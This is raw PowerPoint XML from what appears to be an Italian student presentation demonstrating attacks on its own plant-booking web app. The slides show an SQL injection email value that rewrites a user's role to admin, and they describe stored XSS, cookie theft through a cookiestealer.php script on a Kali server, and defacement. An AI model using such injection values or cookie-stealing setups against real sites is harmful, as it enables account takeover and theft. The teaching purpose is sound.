                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D59A9DE2-D123-044F-2066-C7874335D900}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="694479" y="3184594"/>
            <a:ext cx="3553429" cy="2505623"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="CasellaDiTesto 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AC2DCCD3-B788-C974-8A13-EB91A8303F93}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4335712" y="3724947"/>
            <a:ext cx="7497475" cy="1200329"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t>Input:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" b="1" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>james@example.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" b="1" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" b="1" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>';UPDATE `user` SET `</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" b="1" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>role</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" b="1" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>`='admin' WHERE `email` LIKE ’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" b="1" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>james@example</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" b="1" dirty="0" err="1">
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" b="1" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>'; --</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="it-IT" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="16" name="Immagine 15">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FD58B9C2-1991-F339-98B5-1EF8F275A8D1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3567552" y="5646147"/>
            <a:ext cx="7716143" cy="187494"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="248514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Rectangle 39">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dirty="0"/>
              <a:t>Demo: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4800" dirty="0" err="1"/>
              <a:t>Attacco</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4800" dirty="0"/>
              <a:t> XSS</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Graphic 6" descr="Web design con riempimento a tinta unita">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7DCEE263-A236-0551-7D01-4A1E3E8248E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16682" y="625683"/>
            <a:ext cx="5454246" cy="5454246"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>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267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Attacco Cross-Site Scripting (XSS)</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Un attacco XSS (Cross-Site Scripting) si verifica quando un attaccante inietta e esegue del codice di scripting malevolo all'interno di una pagina web visualizzata da un utente. L'obiettivo principale di un attacco XSS è sfruttare una vulnerabilità nell'applicazione web per eseguire codice lato client non autorizzato sul browser dell'utente.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="just">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="it-IT" sz="1600" b="0" i="0" u="none" strike="noStrike" dirty="0">
              <a:effectLst/>
              <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="just">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" dirty="0">
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>La tipologia di attacco affrontata è quella </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" dirty="0" err="1">
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>Stored</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" dirty="0">
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>, dove </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" b="0" i="0" u="none" strike="noStrike" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>il codice di scripting malevolo viene inserito e memorizzato in un  database. Quando un utente accede alla pagina contenente il codice, quest’ultimo viene eseguito nel suo browser.</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" sz="1600" dirty="0">
              <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="just">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="1800" dirty="0">
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="just">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="it-IT" sz="1800" b="0" i="0" u="none" strike="noStrike" dirty="0">
              <a:effectLst/>
              <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3591448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Attacco Cross-Site Scripting (XSS)</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James dopo aver modificato il suo ruolo in admin, ha accesso alla funzionalità di aggiunta di una pianta. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="just">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" b="0" i="0" u="none" strike="noStrike" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>Qui, inserirà del codice di scripting malevolo. Inizialmente un semplice </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" b="0" i="0" u="none" strike="noStrike" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>alert</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" b="0" i="0" u="none" strike="noStrike" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" sz="1600" dirty="0">
              <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="just">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="1800" dirty="0">
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="just">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="it-IT" sz="1800" b="0" i="0" u="none" strike="noStrike" dirty="0">
              <a:effectLst/>
              <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Immagine 4" descr="Immagine che contiene testo, schermata, Carattere, linea&#10;&#10;Descrizione generata automaticamente">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{86BF36AF-DF11-76A4-5F35-12A2F1CFA7CB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1226916" y="3750395"/>
            <a:ext cx="3849627" cy="2421805"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Immagine 6" descr="Immagine che contiene testo, Carattere, numero, schermata&#10;&#10;Descrizione generata automaticamente">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{00B01205-25A8-3E99-BBD7-21C62A83410D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4554406" y="5519626"/>
            <a:ext cx="6840638" cy="1070708"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="29990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Attacco Cross-Site Scripting (XSS)</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400" b="0" i="0" u="none" strike="noStrike" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>Dopo l'attacco XSS, se Alice decide di utilizzare il sito web, potrebbe essere soggetta a visualizzare un avviso (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" b="0" i="0" u="none" strike="noStrike" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>alert</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" b="0" i="0" u="none" strike="noStrike" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>) indesiderato o non autorizzato.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Immagine 5" descr="Immagine che contiene testo, fiore, schermata, pianta&#10;&#10;Descrizione generata automaticamente">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{724F6A3D-60C8-E758-CCA2-175CEDA95AB9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3626714" y="3429000"/>
            <a:ext cx="4938572" cy="3011799"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3640866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wrap="square" tIns="46800">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0" algn="just">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" b="0" i="0" u="none" strike="noStrike" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>Il furto di cookie (cookie </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" b="0" i="0" u="none" strike="noStrike" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>theft</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" b="0" i="0" u="none" strike="noStrike" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>) è un'attività in cui un individuo o un attaccante riesce ad ottenere in modo illecito i cookie di autenticazione di un utente senza il suo consenso. Questo può consentire all'attaccante di assumere l'identità dell'utente, accedere ai suoi account o servizi online, violare la sua privacy o utilizzare le informazioni personali a scopo malevolo.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="just">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="it-IT" sz="1400" b="0" i="0" u="none" strike="noStrike" dirty="0">
              <a:effectLst/>
              <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Immagine 4" descr="Immagine che contiene testo, schermata, software, Carattere&#10;&#10;Descrizione generata automaticamente">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A7C5C575-98E6-3EB9-F20D-20431916C7E0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7413784" y="3518702"/>
            <a:ext cx="3096027" cy="3012189"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="CasellaDiTesto 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8987E0B6-0E8A-3EBA-5CFE-5E677C9A9F00}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1115568" y="3597011"/>
            <a:ext cx="6331798" cy="861774"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0" algn="just">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" b="0" i="0" u="none" strike="noStrike" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>Per poter effettuare l’attacco XSS che prevedesse il furto </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" dirty="0">
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" b="0" i="0" u="none" strike="noStrike" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>cookie, </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="just">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" b="0" i="0" u="none" strike="noStrike" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>è stato installato un server web Apache sulla macchina </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" b="0" i="0" u="none" strike="noStrike" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>Kali</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" b="0" i="0" u="none" strike="noStrike" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t> Linux. </a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" sz="1600" i="0" u="none" strike="noStrike" dirty="0">
              <a:effectLst/>
              <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="it-IT" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="881725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33D91A-FD3A-8643-C55F-E9D06E13D0EB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t>L’APPLICAZIONE WEB</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Segnaposto contenuto 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3113790D-FBC1-F0B7-4ADE-1877D4B427EB}"/>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L'admin ha accesso a una serie di funzionalità chiave per gestire l'applicazione. Queste includono:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just"/>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" dirty="0">
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>Login</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just"/>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" b="0" i="0" u="none" strike="noStrike" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>Gestione delle piante</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just"/>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" b="0" i="0" u="none" strike="noStrike" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>Gestione delle prenotazione utente</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" sz="1600" dirty="0">
              <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="just"/>
            <a:endParaRPr lang="it-IT" sz="1800" dirty="0">
              <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Segnaposto contenuto 4" descr="Immagine che contiene fiore, testo, pianta, schermata&#10;&#10;Descrizione generata automaticamente">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{18F9C160-5FCB-81F6-5266-AA5827BC936A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1456869" y="4277706"/>
            <a:ext cx="3337554" cy="2031654"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Segnaposto contenuto 5" descr="Immagine che contiene testo, schermata&#10;&#10;Descrizione generata automaticamente">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E0A56515-646F-9EE5-5B3E-E7987F06440E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6374734" y="2953264"/>
            <a:ext cx="3328650" cy="1875015"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Immagine 5" descr="Immagine che contiene testo, schermata, Carattere, numero&#10;&#10;Descrizione generata automaticamente">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C99F89AB-783C-E824-03E3-E31FA4EB4E3F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4"/>
          <a:srcRect r="5393"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6096000" y="4828279"/>
            <a:ext cx="3823252" cy="1683337"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="127911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Fatto ciò</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" dirty="0">
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>, è stata creata un </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" dirty="0" err="1">
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>DocumentRoot</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" dirty="0">
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>, dove è stato inserito lo script </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" i="1" dirty="0" err="1">
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>cookiestealer.php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" i="1" dirty="0">
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" dirty="0">
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>e una pagine per il </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" dirty="0" err="1">
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>defacement</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" i="1" dirty="0">
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" i="1" dirty="0" err="1">
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>deface.html</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" dirty="0">
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="l" fontAlgn="auto">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" b="0" i="0" u="none" strike="noStrike" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>La scelta di effettuare il </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" b="0" i="0" u="none" strike="noStrike" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>defacement</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" b="0" i="0" u="none" strike="noStrike" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t> della homepage è stata intenzionale al fine di dimostrare il successo dell'attacco. Tuttavia, sarebbe stato più appropriato effettuare una </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" b="0" i="0" u="none" strike="noStrike" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>redirect</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" b="0" i="0" u="none" strike="noStrike" dirty="0">
                <a:effectLst/>
